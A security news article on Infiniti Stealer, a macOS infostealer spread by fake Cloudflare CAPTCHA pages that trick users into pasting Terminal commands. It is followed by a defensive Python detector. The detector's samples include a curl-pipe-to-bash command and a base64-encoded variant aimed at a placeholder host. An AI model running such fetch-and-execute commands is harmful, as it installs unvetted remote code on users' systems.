A new infostealer called Infiniti Stealer targets Mac users through fake CAPTCHA pages that trick victims into running dangerous commands in the Terminal.
Security researchers at Malwarebytes have identified a new malicious campaign targeting crypto users on macOS. The attack uses fake CAPTCHA pages that mimic the Cloudflare verification system to trick victims into installing an infostealer called Infiniti Stealer, designed to steal crypto wallet data, credentials, and other sensitive information from Apple computers.
The attack falls under the ClickFix category – a social engineering technique in which the user is manipulated into executing the malicious command themselves. The process begins with a fake page hosted on update-check[.]com, which faithfully replicates the appearance of a Cloudflare verification screen. After clicking the fake CAPTCHA, the user is instructed to open the Terminal and paste a command. That command is not a verification step: it is a hidden installation script that downloads and executes the malware on the computer.
Once the command is run, the system connects to a remote server controlled by the attacker, from which Infiniti Stealer is silently downloaded and installed – with no pop-ups or warnings. Researchers point out that the malware is compiled as a native macOS binary, making it significantly harder to analyze and detect than a simple Python script. The malicious software is designed to steal crypto wallet data, credentials from browsers and the macOS Keychain, plaintext secrets from developer files, and screenshots captured during execution. It also checks whether it is running in an analysis environment to evade detection, sends the stolen data to the attacker’s server, and notifies the attacker via Telegram upon completion of the extraction.
The data confirms a worrying trend in personal wallet security. According to a report by blockchain security firm Chainalysis, $3.4 billion was stolen from the cryptocurrency industry in 2025. The most significant figure relates to the growth of attacks targeting personal wallets: their share of total stolen value rose from 7.3% in 2022 to 44% in 2024. Without the anomalous impact of the Bybit attack, this percentage would have reached 37% in 2025 as well.
Crypto users are advised to never paste commands into the Terminal from untrusted sources and to exercise maximum caution while browsing.
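As an added illustration (not code from Malwarebytes or from the campaign), the Python sketch below checks a pasted Terminal command for the download-and-execute shape described above, including one hidden inside a base64 layer. The regular expressions, function names and sample commands are assumptions constructed for this example, since the article does not publish the actual command.

```python
import base64
import binascii
import re

# Assumed heuristics: the article does not publish the real command, so these
# only describe the general download-and-execute shape it reports.
FETCH = re.compile(r"\b(curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(sudo\s+)?(ba|z|da)?sh\b")
SUBST_EXEC = re.compile(r"\b(ba|z)?sh\s+-c\s+[\"']?\$\(|\beval\b")
DECODE = re.compile(r"\bbase64\s+(-d|-D|--decode)\b")
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")

def decode_blobs(command):
    """Return readable text recovered from base64-looking runs in the command."""
    found = []
    for blob in B64_BLOB.findall(command):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not valid base64, or not text
        if text.isprintable():
            found.append(text)
    return found

def assess(command, depth=0):
    """Return the reasons a pasted command looks like download-and-execute."""
    reasons = set()
    fetches = bool(FETCH.search(command))
    if fetches and PIPE_TO_SHELL.search(command):
        reasons.add("fetch piped to shell")
    if fetches and SUBST_EXEC.search(command):
        reasons.add("fetch result executed")
    if DECODE.search(command) and PIPE_TO_SHELL.search(command):
        reasons.add("decoded text piped to shell")
    if depth < 2:  # look inside encoded layers, but bound the recursion
        for hidden in decode_blobs(command):
            reasons.update("hidden: " + r for r in assess(hidden, depth + 1))
    return reasons

# Constructed samples; example.invalid is a placeholder host.
PLAIN = "curl -fsSL https://example.invalid/verify.sh | bash"
INNER = base64.b64encode(PLAIN.encode()).decode()
ENCODED = f"echo '{INNER}' | base64 -D | bash"
BENIGN = "curl -O https://example.invalid/file.dmg"

if __name__ == "__main__":
    for cmd in (PLAIN, ENCODED, BENIGN):
        print(sorted(assess(cmd)) or "no match", "<-", cmd[:60])
```

Legitimate installers use the same command shapes, so a match is a cue to read the script before running it, not a verdict.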





